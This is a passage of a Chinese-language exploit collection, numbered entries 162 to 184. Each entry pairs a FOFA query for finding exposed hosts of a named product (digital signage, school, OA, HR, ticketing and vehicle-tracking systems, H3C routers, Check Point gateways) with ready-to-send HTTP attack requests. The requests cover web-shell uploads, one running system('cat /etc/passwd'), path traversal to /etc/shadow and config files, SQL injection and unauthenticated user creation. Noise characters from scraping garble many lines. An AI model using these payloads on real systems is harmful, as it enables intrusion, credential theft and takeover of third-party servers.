8 ]2 O& F/ q+ w$ ?) L) EContent-Length: 445) J* \4 Q5 {5 H. t
Content-Type: text/xml
+ P e) y. g. E( o, t$ v) nAccept-Encoding: gzip; l( n0 d% m$ F8 s
- Q4 e% o2 ~+ `1 \( b6 E+ L<?xml version="1.0" encoding="utf-8"?>
* y3 q6 i2 o( d: R<soap:Envelope xmlns:xsi="9 s2 \$ b- q |
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
4 p4 a) r: C& Z% d8 m$ F; P' M$ `xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! D9 x1 T0 _/ g0 t2 a( t' e& \3 z' g<soap:Body>0 p0 M+ y, }4 V! o& V) i( O. R
<UploadResume xmlns="http://tempuri.org/">+ J- q" k/ k* y# ^6 [
<ip>1</ip>8 n# A2 o' w9 V
<fileName>../../../../dizxdell.aspx</fileName>
" e* Q% y9 V7 I, u% @$ b/ Q+ n. O<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>5 b5 ^( M5 O& D. _$ ]4 F) q
<tag>3</tag>
: ~" h1 _* X1 V! v, N. Q</UploadResume>- y; f" a7 j4 R5 S5 _
</soap:Body>
4 q! L: _. M6 d! C) l# v& h8 k# s9 q</soap:Envelope>
" A a h4 I, r$ B+ h) z( w
4 l9 d5 o: x( {7 _( _6 [. l- |: p* r0 s+ T4 w: @: }
http://x.x.x.x/dizxdell.aspx, [' ?( U' K" z4 v, C
1 U6 k$ F7 P( q+ N7 H( W0 ~* u162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
0 r$ e$ n; T$ k3 h" g. yFOFA: app="和丰山海-数字标牌"( P% Q0 P$ u5 T3 ]- s
POST /QH.aspx HTTP/1.1: p' I6 [$ p! O7 M: m& j6 n3 s( E s
Host: x.x.x.x
2 {% f! V7 I- n/ tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& c/ [* Q4 K* b
Connection: close* I5 Q) |- F, Q9 N/ C
Content-Length: 5835 p& X! Z! p6 O. L1 d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
! s5 l V( }: ?8 q. h4 w! TAccept-Encoding: gzip
) o, H! r8 S. @( a1 ]- O% |
) ~8 \3 r! F) i- v* o1 O: Z------WebKitFormBoundaryeegvclmyurlotuey
- r0 z; H; ^# `0 l% K- f9 MContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
; ]8 x% t: E. ]1 j, JContent-Type: application/octet-stream( h( m) c3 ^. L* f: B/ Q# ~& i
. H# a2 k) f1 c1 g& o7 b [
<% response.write("ujidwqfuuqjalgkvrpqy") %>6 D6 Y+ |9 o ?: w0 z( T
------WebKitFormBoundaryeegvclmyurlotuey
[* N; `6 k$ ]* Y# vContent-Disposition: form-data; name="action"
9 e$ K9 `; x8 C/ x/ Y! O' W; e2 w, p" [: X+ {. n; n- K4 Q0 T
upload
# P& N- B( R3 Y7 E------WebKitFormBoundaryeegvclmyurlotuey
7 ?8 [- }3 Q$ X$ F j$ TContent-Disposition: form-data; name="responderId"
4 h1 E+ C2 C6 P$ Y
% E1 s' h0 j0 g8 o$ x4 Q7 K4 |ResourceNewResponder6 G8 M* \+ ~4 b- C
------WebKitFormBoundaryeegvclmyurlotuey9 ?1 j: L% F1 \0 ]5 _
Content-Disposition: form-data; name="remotePath"5 V$ E1 ]8 o; G( U# c
$ Y9 Q0 @/ [8 l/opt/resources8 V0 G* N+ ~3 X% \* H& H7 t- m
------WebKitFormBoundaryeegvclmyurlotuey--
9 G ^& N2 g; W/ F0 E% T1 _# A k# W; V4 D
% ~5 V" u0 O* h$ j( r% z. chttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
' ]. e" z z: W2 V( N/ x# C
/ Z3 W" k2 T: Y5 v163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
2 s. H* `# x' Z3 bFOFA: icon_hash="-795291075"
6 `/ S. h1 C4 G6 R" q5 OPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1* T- z1 m) z( ~) o
Host: x.x.x.x$ {- @" t2 q# v/ o0 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
4 Z; b$ Q0 X8 v. I6 Q* \0 ?, c/ `Connection: close' Z- q; l+ F, P; r
Content-Length: 293' n* J# v1 ]; B1 k' y$ e8 D% @* s
Accept: */*8 V. h2 I2 u' X5 {( q) L# }8 ?) G" B
Accept-Encoding: gzip, deflate7 l& O9 [$ n- l! r
Accept-Language: zh-CN,zh;q=0.91 [1 k+ I) r0 Y( N# L' }
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod/ i9 f3 G0 E) g. ?9 k4 _# w
0 \/ R6 ^* Q( J, W4 {
------iiqvnofupvhdyrcoqyuujyetjvqgocod
* Y3 S) Q K c( {Content-Disposition: form-data; name="name"8 q8 Y3 R; `9 E0 K2 {6 b) E
; K, L6 Z6 X0 ?9 L! g# W
1.php \: L6 P, c ]; c7 W4 K
------iiqvnofupvhdyrcoqyuujyetjvqgocod
+ c1 L" e y9 j1 W3 w/ ]Content-Disposition: form-data; name="upfile"; filename="1.php"
! Z' q9 R8 E6 T# S+ R1 p' ~Content-Type: image/jpeg
# Z% o l( r1 w& O3 ]$ I
! L q1 _/ a* s' {: m& Lrvjhvbhwwuooyiioxega
% `* z; j- j+ V* G% M) t------iiqvnofupvhdyrcoqyuujyetjvqgocod--. n9 t f: {$ ~2 }1 e5 Q2 L& ]: C
, |- f+ a' Q: _5 _
7 @% i8 X, e& v( S' a; I164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
- p3 i; c1 I9 {# ?" A' ~ Q. u7 JFOFA: title="智慧综合管理平台登入". b1 Q% e! S% Q! U- X9 S
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.18 p8 T/ A( p7 N3 O7 F \- n
Host: x.x.x.x
: k) c5 u1 P+ D3 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
, u6 d+ c5 b+ a, V/ f7 kContent-Length: 288
. w+ S, T- g$ F7 g1 ?" s( eAccept: application/json, text/javascript, */*; q=0.01
6 P% w* h/ }* E, b- `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,3 n, a3 r- L7 A( q. @
Connection: close3 d+ ~' K: E9 Q+ G2 [: `( t
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl- \+ [' m/ h0 D: D$ s& q: d( K
X-Requested-With: XMLHttpRequest% U0 E2 ?. g* @8 C
Accept-Encoding: gzip
1 y; Z$ K- e# L% s. a; V1 K% V) n
0 f' G( @( V# i$ v; R9 S------dqdaieopnozbkapjacdbdthlvtlyl
- W3 M1 C; X+ K aContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"( `7 M, J& B( K9 f) j5 s/ z L
Content-Type: image/jpeg
* P1 O' x) e& t8 Y5 @
- I1 w* _4 o3 F, c" \4 |2 K+ |<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
( o- y; k4 n3 T& u/ A6 Q------dqdaieopnozbkapjacdbdthlvtlyl--5 Y, Y1 {0 [% x/ J$ b7 |) M
. r* N" [4 u( D- p$ P
! y) s& K' w" B) ]7 C" I } khttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
! S# _* U; {. M) g; e& k
- z, Q' L! ~/ H C, _6 W3 ^* l# o165. OrangeHRM 3.3.3 SQL 注入" _/ V; K2 [+ g5 ^2 B3 M( m, K5 R3 u
CVE-2024-36428
7 u% U% ~, \+ B5 d. X# JFOFA: app="OrangeHRM-产品"
7 F6 Z1 O6 _& {$ J( |URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)); T2 y+ d6 O+ L& A$ v' N8 B$ K
* z. K2 L B# t: K
" R3 A: m& A; Q4 E166. 中成科信票务管理平台SeatMapHandler SQL注入% D# R% _. e6 m- ^* F: z
FOFA:body="技术支持:北京中成科信科技发展有限公司"
( F- s! ^9 A* A K* Q2 l( B0 k9 GPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
' M9 X& p6 H* ]5 M0 P6 ]' M: _Host:
/ b5 c0 }- H7 z# f# k# mPragma: no-cache/ w$ s4 @' }& s4 {- o V& j1 C
Cache-Control: no-cache/ q5 d7 n5 N( n9 s& v
Upgrade-Insecure-Requests: 14 G0 f, C* \2 i ^, o- s" n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 \: r, m! C$ q, d- u" Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 F0 W3 {- D; A! \# f. Z9 }
Accept-Encoding: gzip, deflate6 k" d; H( v* `$ K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ Q5 Q0 d. S* s7 @7 d4 V# O) C
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
% a7 d6 ?" {6 ZConnection: close
2 d1 x* B6 [3 q4 M0 w: ?6 `Content-Type: application/x-www-form-urlencoded
5 c8 K0 ?) m2 O0 XContent-Length: 89
! R/ {4 F% X' y) @- f# K
+ `, _7 U Y$ s) B AMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE; w! ]# Y% T6 U9 H, ]4 l5 m5 _" m3 F
7 E- |3 \( U3 s) `8 @/ @# M/ R% l7 Y. ~* Z3 q9 u) F2 a) p" D- j- R
167. 精益价值管理系统 DownLoad.aspx任意文件读取
* X4 v8 D5 h( n! b1 E. s1 c3 fFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"7 R1 w% b, d* j) C
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.19 k4 ]8 P$ l" ?% N2 ` ?
Host:* c0 Z9 {- Q3 h% x; `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# F, p0 ]8 H# @' N5 M8 C! \# ~
Content-Type: application/x-www-form-urlencoded' j/ H1 ` r% m- T+ M5 r
Accept-Encoding: gzip, deflate0 U, k, K3 |: ?. b6 G
Accept: */*
( M! ~* r- `$ A ~! L7 C5 r; D- |Connection: keep-alive% }8 _6 z. }. @* ]" A% V
$ A( C4 R3 g, q' s7 q
1 @6 Q# K" O o% W1 R
168. 宏景EHR OutputCode 任意文件读取1 R) B5 h3 |/ }# V
FOFA:app="HJSOFT-HCM"
- N/ x h. u1 |2 _GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1; @8 `- h2 L t) x- h- V9 [1 e
Host: your-ip2 d: Q: A$ Z5 f: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.363 b( U. T% W. E; {1 G% K
Content-Type: application/x-www-form-urlencoded
- `2 ?3 H8 y2 R6 ` c) qConnection: close0 o. h+ G" [) p
5 m* h/ g+ ?6 L' [, c. c0 W/ Z7 i' E5 D2 Y5 y) D- b
9 q8 b1 o! m% n7 F. a, G! t% o169. 宏景EHR downlawbase SQL注入
( B. I8 [* r- L+ b1 t6 l! oFOFA:app="HJSOFT-HCM"( I |5 s/ N8 w5 g' g
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
+ S% A/ T2 \1 M) T' iHost: your-ip2 q3 X$ d0 ]& E; n1 x# \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) B; W0 C( k9 n! A& R2 j
Accept: */*
$ f" A* ^! A/ M! V! fAccept-Encoding: gzip, deflate
8 f7 y( S3 Z) s. A3 }2 ^Connection: close0 s! S4 f8 G+ E. i* b
/ l& H! t2 \; ?) v& S8 G' A) N) R
( e6 k) o. }* i% G7 O! h7 z
1 I5 a5 ] q% n+ f' T! n170. 宏景EHR DisplayExcelCustomReport 任意文件读取
5 Y |- Z; c( D( i7 PFOFA:body="/general/sys/hjaxmanage.js") W) l2 N8 m* t% v% S) ~4 y
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1- H9 `4 }* Q* l# p7 `7 {9 L2 [( j
Host: balalanengliang
5 e. {( ]: e2 j4 z# ]1 Q" T/ _User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ B: g; T k& bContent-Type: application/x-www-form-urlencoded) p" }' n. G; t) [
4 F1 q3 u7 P' T& B" }filename=../webapps/ROOT/WEB-INF/web.xml" R& d; v6 U" X1 |
3 \( P7 O" N: W# A8 ~
! g& x j4 t( Q* y+ d" Y171. 通天星CMSV6车载定位监控平台 SQL注入
/ E- \3 ~, Z! f8 h0 e5 ~0 yFOFA:body="/808gps/"
8 \- ^0 V! R& V; }1 M5 ?GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
7 i; |. ]% [7 aHost: your-ip
) O& h F( o$ Y% S, zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
7 J8 r- q& o2 ^2 |8 ^; |) GAccept: */*
6 U! J' R# p* AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; s' ?$ L/ ]: Y7 XAccept-Encoding: gzip, deflate
7 T/ W, P* x, }: V4 `/ E' |Connection: close
: `$ \' l) H2 y% M. \1 S3 D. a* x8 R/ m2 Y# |
9 x0 O& Z# ?9 X! c/ A
2 Q* X+ g1 T# X9 M) O$ w+ Y7 H172. DT-高清车牌识别摄像机任意文件读取
% y( v+ `5 \! ]! E/ z# T& ?FOFA:app="DT-高清车牌识别摄像机"
$ s( c& \3 E5 Q+ ^6 e4 VGET /../../../../etc/passwd HTTP/1.1) r8 N6 Z0 j1 D0 J
Host: your-ip- j8 F2 q9 @% m5 O( D* y6 Z$ w7 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) h/ c. m" V+ V. \4 C+ F! o( @7 xAccept-Encoding: gzip, deflate l$ K! k6 Y& w0 y7 _6 w
Accept: */*
# W7 G: @$ [* ~) }- GConnection: keep-alive
4 e _% o1 m8 Y; B; _1 |3 H" l U8 E2 y/ n" \" _+ ]( m( t; H
$ a, N) {3 `! N
6 {2 p8 g7 T( V# o: N
173. Check Point 安全网关任意文件读取
5 I7 u8 X H4 eCVE-2024-24919& P3 g) N& j( i9 ?/ u, F
FOFA:app="Check_Point-SSL-Network-Extender"
: b' `, r3 N8 @0 c( q- R/ F7 b' `POST /clients/MyCRL HTTP/1.1
8 T* y# o( q& X# pHost: your-ip
% C* r H. b# p! c# y' KContent-Type: application/x-www-form-urlencoded9 A1 ?& u+ s2 y: t
3 b4 P. Y$ ~! y4 yaCSHELL/../../../../../../../etc/shadow
! ~% m# k+ w( v- o) b+ J; S. Y5 J2 l
4 u9 N% l. m3 b9 S
4 p3 Z$ i/ J2 z: \174. 金和OA C6 FileDownLoad.aspx 任意文件读取: r9 w _6 L# N& O# i; R- y
FOFA:app="金和网络-金和OA" w4 x/ d, |/ F3 W. q* |
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.19 e, J: ?& g' p) o" I# ]4 c" L
Host: your-ip5 t) K- b" t% Z2 o" U% D) L$ I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! w+ n, |) _9 {- ^$ d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& U, S; S+ o2 S9 U. U3 [Accept-Encoding: gzip, deflate, br9 {! |* P7 P. X# K" H
Accept-Language: zh-CN,zh;q=0.9
4 x8 E$ o& l$ l. K* a" xConnection: close
9 Z) r8 @( h" Z0 T# z$ h# ~2 n1 g" ]+ s5 m e# Z
( n- Q: x( }; r) _, p e6 u; E$ S5 ]/ s2 R
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# _) s- v* W0 A/ Y! LFOFA:app="金和网络-金和OA"
: L3 b7 a2 ~3 |- D, S) EGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
, N4 g# u! E4 K6 ~Host:! b, K) O' @0 j1 Z! ?1 c4 j% ~
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 g, u! _; Z0 v0 C' P, g/ L. J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 B m1 I r' @- fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( H! x- ?7 g) ~( u( b
Accept-Encoding: gzip, deflate8 Z. t3 a/ O( r9 P
Connection: close
9 F, W7 d2 _( D! P9 e8 D2 BUpgrade-Insecure-Requests: 1
0 Q( |+ l- g6 `/ u
! P% |1 w/ P% a& G1 O7 A, N' h! m& n$ S" C% W+ l5 |
176. 电信网关配置管理系统 rewrite.php 文件上传2 j- T! H6 D1 o x( Y
FOFA:body="img/login_bg3.png" && body="系统登录"
7 N- G6 Q3 F/ y! \" e: I( O. T* vPOST /manager/teletext/material/rewrite.php HTTP/1.11 |1 G' y6 I$ u& C0 \' _
Host: your-ip, T+ ^6 }' W% j& n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; {: g7 g3 `: l1 n1 K) J7 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
2 S3 b* G. ^; N* c: S3 VConnection: close' [1 ~ `8 a2 K _8 m2 @& e
2 `+ D6 T7 E9 U. n+ t& t/ `
------WebKitFormBoundaryOKldnDPT
% U4 @ M& b1 ?2 S0 TContent-Disposition: form-data; name="tmp_name"; filename="test.php"9 r6 l9 v0 P! M) V! Y1 _
Content-Type: image/png
- j: ]& r6 q; _7 Z ) q2 Y' f6 [/ w
<?php system("cat /etc/passwd");unlink(__FILE__);?>
5 v, S w/ i1 j( O% T5 t' Z------WebKitFormBoundaryOKldnDPT
/ X" x- f1 Z- W+ U0 X- R1 XContent-Disposition: form-data; name="uploadtime"
5 I0 ^1 i" W7 }& f) Q & ]8 u: X* c/ r0 k: a
0 g8 l% x: E" g, ~* A$ ~------WebKitFormBoundaryOKldnDPT--; q$ J6 l6 Q4 G: r: k. ]8 U
" E9 k- ]* _+ Q: w9 P
- W. {& X6 [4 U8 [/ r
7 v. z. ~9 f% l p/ m177. H3C路由器敏感信息泄露
% M# f4 X3 W. g. z9 I& Z/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
; q" o) u7 D$ D. [9 O/userLogin.asp/../actionpolicy_status/../M60.cfg Y( Q$ i& [7 q5 t$ j5 q! N6 F$ d
/userLogin.asp/../actionpolicy_status/../GR8300.cfg/ g) r7 e ]0 Q z8 C% f
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
* Y: g, f/ f: p! A6 P6 K/userLogin.asp/../actionpolicy_status/../GR3200.cfg
8 l2 i2 x+ a" U$ t; ^/userLogin.asp/../actionpolicy_status/../GR2200.cfg
3 E' ^- U* W! L1 D7 | W/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
6 f4 X& E, [5 P; j* Z5 H/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ N8 s- q& |9 ^$ K8 Z( ^8 m5 F
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg$ w: {" W" P O9 |
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
) a; F5 T$ [; R) B/userLogin.asp/../actionpolicy_status/../ER5200.cfg5 B% e6 B, N! C) U4 ]5 m
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
+ D% c4 F" N( i6 c3 _" a4 o! F/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
4 H, v" V8 C; m- I8 L# N/userLogin.asp/../actionpolicy_status/../ER3260.cfg' v+ }* k0 u- x" l$ l9 C
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
- d- _. q z) [* s/userLogin.asp/../actionpolicy_status/../ER3200.cfg" O; @% | I& t) Y5 h- D
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
3 _9 O& K- L9 G7 h/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
+ n; m! n9 l0 {, `( T/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( v6 g2 Z5 A8 d9 K6 e. P' M& u/userLogin.asp/../actionpolicy_status/../ER3100.cfg
) R% N7 |3 D: A/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg5 n2 D1 e4 E0 P1 F+ `' d4 }' r8 R
8 U& ]1 M f3 [3 C6 a" H& S5 K
" e3 w. g. _" d& V3 o8 B
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
% Z$ V8 J4 h, i* E: S* BFOFA:header="/selfservice"
2 L0 P+ u$ Y4 NPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
+ a9 t: c" Y% ?2 l( p4 {8 hHost:
I4 `% o7 {' n3 }! d zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 B* x" Z0 o# `% s0 yContent-Length: 252
5 b) |$ ]+ p) {4 P+ o8 LAccept-Encoding: gzip, deflate
& W$ }# D( k; X0 JConnection: close/ G2 N! E) q: A0 ]! ], h. l
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
8 p* ]# k; U5 |- y2 K-----------------aqutkea7vvanpqy3rh2l+ u) d) e, b; e q* ]. [
Content-Disposition: form-data; name="12234.txt"; filename="12234"! h. |6 ~" w! c- x9 ~1 x; Y, Y
Content-Type: application/octet-stream
9 {8 v/ h: v/ W! q/ ?5 N1 v% @Content-Length: 255+ v( i1 B1 ?5 |9 N0 r, ^+ u
N+ \* Q/ ^1 C( A9 N12234$ v3 z# A0 U: i3 B) u+ J# V: |
-----------------aqutkea7vvanpqy3rh2l--. ~9 D" b1 Y) h9 r1 i: B
$ G! @0 e" p4 N6 t P3 A1 n
' ^$ C# O( h0 {& Q) G
GET /imc/primepush/%2e%2e/flex/12234.txt
8 y: K' Z9 c! W) W
: B. ~* Q& z& f% j; n. }
% Z, p/ D3 Y6 E% ~" m V3 n179. 建文工程管理系统存在任意文件读取
0 X) B# V! z4 v1 H5 r$ QPOST /Common/DownLoad2.aspx HTTP/1.1
+ X+ p" [5 x2 X9 v* ~2 AHost: {{Hostname}}
@3 x$ n2 Q* B$ A# @Content-Type: application/x-www-form-urlencoded6 T* t# ]7 @0 N* B5 L# }& U
User-Agent: Mozilla/5.03 Z, A5 {, G- p% v8 m1 \
u9 y$ C' `7 `) m; K
path=../log4net.config&Name=
2 N$ s2 m0 n. X2 k- L9 [1 {+ k) I) j2 f7 _# p
+ Y8 J( n' v5 d, U8 h; \180. 帮管客 CRM jiliyu SQL注入' K! V5 j5 F1 ]4 t. M6 J
FOFA:app="帮管客-CRM"- w% i+ d) Z6 ]# m& k
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.16 `. {( G. s& w
Host: your-ip
" R# L. u' j( F: X# }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ _- q E& t- p! \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 u/ b0 @; W4 U" f3 B6 B& m+ ]Accept-Encoding: gzip, deflate0 l( p3 b2 [6 u7 i
Accept-Language: zh-CN,zh;q=0.9$ J3 [7 P I3 R% N# ^8 C4 Y& @' B5 x& V
Connection: close: _" d3 D- l; d8 F. f) _$ w6 \% W
, D; k3 K& c" P% E7 n" b) @& E8 z& E1 H# Q6 p [
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
9 K( w" _' R- b3 x/ r c) GFOFA:"PDCA/js/_publicCom.js"/ t' ?) v7 @) H* p9 X0 g
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
2 N/ h; f' M4 H) s. Y3 QHost: your-ip1 K- z+ f0 L1 {( l# D" j0 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36+ D" x. u, r/ g* Y) J8 O* T$ Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! D1 ?( x% K' F
Accept-Encoding: gzip, deflate, br
) T" P& U4 u% D2 TAccept-Language: zh-CN,zh;q=0.90 r% u5 ]1 J! ?0 A: a* r- q; W
Connection: close
0 F; r8 |2 [; j) A4 w+ }, [Content-Type: application/x-www-form-urlencoded
* p) L7 M5 G# X2 e, B( ]. g( A0 o3 c( t# k3 v5 m+ u3 i! u
% h' r" U, Z" V0 m& Baction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=203 O! M/ |) P A' B5 |! Z9 y
; ~) r3 \4 k& Z9 ]/ D
7 @# L. ?& r3 h5 F2 M9 O" _182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
" d) l7 J! }. Q9 L$ Z2 H5 ]3 m5 hFOFA:"PDCA/js/_publicCom.js" f- R+ u$ I9 e: J
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1$ W1 u! Y6 R' q8 ~( a4 G
Host: your-ip
7 K# O, f3 }/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 ~/ P) v5 A U# c. f# d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: k& a/ H. _7 k) l0 q' h& H8 ^" @" kAccept-Encoding: gzip, deflate, br
7 _1 |1 S1 T1 a" w1 i) x0 rAccept-Language: zh-CN,zh;q=0.9
: d9 |( d/ B/ P, VConnection: close0 G# [: t5 P8 m
Content-Type: application/x-www-form-urlencoded
1 B. ~8 ?- p0 G- u8 N
- Y0 E8 N" Q7 t) d- w& ~$ R5 n
. s5 Z2 Q7 V ^2 Xusername=test1234&pwd=test1234&savedays=1' `6 W1 H- Z" V2 i- _( c$ n( s+ q: H4 J
J, D; a% ]9 j7 y. O
+ P0 s6 u3 j% r; @3 s9 P183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入2 F+ f! B' A) n: F/ I4 e
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"& {$ b0 S0 `. u0 ?" R# Y4 H
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
% k9 z) Y- ]9 T: N4 u( S) NHost: your-ip
* h0 x1 w( F& }, C( v, MUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 V; H5 W' k: K; S/ k, F1 bAccept-Charset: utf-8
/ ^6 n7 F% G2 Q: }2 E# KAccept-Encoding: gzip, deflate
& l( q3 _- g4 T- qConnection: close
4 U0 V0 v1 q2 E! s& p" r8 i @! k+ _3 L7 ?2 o8 f) v
* K J5 {2 o+ \( P, {, T4 B
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
" H! X3 f3 \3 W( J4 A: \5 ]FOFA:server="SunFull-Webs". ~5 p" M/ W* e8 r7 u! A6 {" r
POST /soap/AddUser HTTP/1.1
9 T: {. F- Y: V2 D# RHost: your-ip+ Q" ^) J( ?$ i. q/ K# O9 \
